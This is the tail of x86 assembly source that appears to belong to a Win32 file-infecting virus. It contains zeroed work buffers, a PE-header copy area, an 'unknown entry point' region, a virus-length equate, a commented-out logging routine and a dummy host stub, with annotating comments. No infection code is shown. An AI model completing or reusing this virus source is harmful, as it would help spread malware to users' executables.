db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
__1:
pop edx
push 2560
pop ecx
call write
call close
__2:
ret
COMMENT &
|
||
|
||
log db 'c:\vampiro.log',0
|
||
|
||
log_it:
|
||
pusha
|
||
push edx
|
||
lea edx, [ebp.log]
|
||
push 2
|
||
pop eax
|
||
call open
|
||
cmp eax, -1
|
||
jnz __1
|
||
push 0 edx
|
||
call [ebp._lcreat]
|
||
__1:xchg eax, ebx
|
||
call fsize
|
||
xchg eax, edx
|
||
call seek
|
||
mov edx, [esp]
|
||
mov esi, edx
|
||
sub ecx, ecx
|
||
__2:
|
||
lodsb
|
||
inc ecx
|
||
cmp al, 0
|
||
jnz __2
|
||
dec ecx
|
||
call write
|
||
push 0D0A0D0Ah
|
||
push 2
|
||
pop ecx
|
||
mov edx, esp
|
||
call write
|
||
pop eax
|
||
call close
|
||
pop edx
|
||
popa
|
||
ret
|
||
&
db '^^'                                 ; two-byte marker placed directly before buff; what reads it is not visible in this chunk

;-----------------------------------------------------------------------
; Zero-initialised scratch storage used by the routines above.
; Presumably still inside the .data section opened near the top of the
; file (the next section directive below is `.code`) -- verify.
;-----------------------------------------------------------------------
buff: db 25*1024+8000 dup (0)           ; main work area: 25*1024+8000 bytes of zeros ...
db 1000h dup (0)                        ; ... followed by a 1000h (4096) byte tail that is
                                        ; unnamed but counted into len_buff below
len_buff equ $-buff                     ; total bytes from buff to here = 25*1024+8000+1000h

buffer db 0F8h + (28h*8) dup (0)        ; 0F8h bytes plus 8 x 28h bytes; the sizes match a PE
                                        ; IMAGE_NT_HEADERS32 plus eight IMAGE_SECTION_HEADERs,
                                        ; so presumably a header copy -- confirm against its users
word3C dd 0                             ; name suggests the dword at DOS-header offset 3Ch (e_lfanew) -- TODO confirm

size_UEP equ 4096                       ; byte size of the UEP area below
UEP db size_UEP dup (0)                 ; 4096-byte area; "UEP" is listed as a feature in the file
                                        ; header, but its use is not shown in this chunk
forUEP dd 0                             ; single dword kept alongside UEP (meaning not visible here)

tbl db 2048 dup (0)                     ; 2048-byte table; contents and indexing not visible here

_vl equ ($-start)                       ; byte distance from the `start` label (defined earlier,
                                        ; outside this chunk) to the end of the storage above
.code
;-----------------------------------------------------------------------
; Host stub. `end host32` names host32 as the image entry point; it
; parks the thread in a self-loop and never falls through to real_start.
;-----------------------------------------------------------------------
host32:
jmp $                                   ; jump to own address: a tight infinite loop

real_start:                             ; not referenced in this chunk; presumably entered from code elsewhere in the file
push 0                                  ; uExitCode = 0
zcall ExitProcess                       ; zcall = extrn + call (macro at top of file): ExitProcess(0), does not return

end host32                              ; entry point of the assembled image = host32